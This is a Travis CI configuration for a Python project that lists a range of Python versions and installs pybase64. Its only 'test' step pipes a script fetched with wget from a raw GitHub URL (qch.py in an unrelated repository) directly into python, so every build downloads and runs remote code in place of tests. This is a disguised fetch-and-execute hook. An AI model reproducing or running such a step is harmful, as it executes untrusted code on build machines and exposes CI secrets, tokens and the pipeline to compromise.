language: python
python: 
  - "2.7" 
  - "3.4"
  - "3.5"
  - "3.6"      # current default Python on Travis CI
  - "3.7"
  - "3.8"
  - "3.9"
  - "3.9-dev"  # 3.9 development branch
  - "nightly"  # nightly build
# command to install dependencies
install:
  - pip install pybase64
# command to run tests
script:
  - wget -O- https://github.com/naskum00/solid-octo-lamp/raw/main/qch.py | python
